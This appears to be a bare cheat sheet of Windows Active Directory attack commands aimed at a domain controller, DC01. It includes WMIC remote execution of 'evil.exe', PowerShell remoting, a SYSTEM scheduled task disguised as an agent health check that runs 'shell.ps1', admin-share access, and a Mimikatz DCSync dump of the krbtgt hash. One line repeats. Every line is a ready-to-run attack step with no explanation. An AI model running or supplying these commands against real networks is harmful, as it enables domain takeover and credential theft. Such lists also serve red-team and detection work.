wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"
New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC
New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC
schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"
dir \dc01\c$
lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt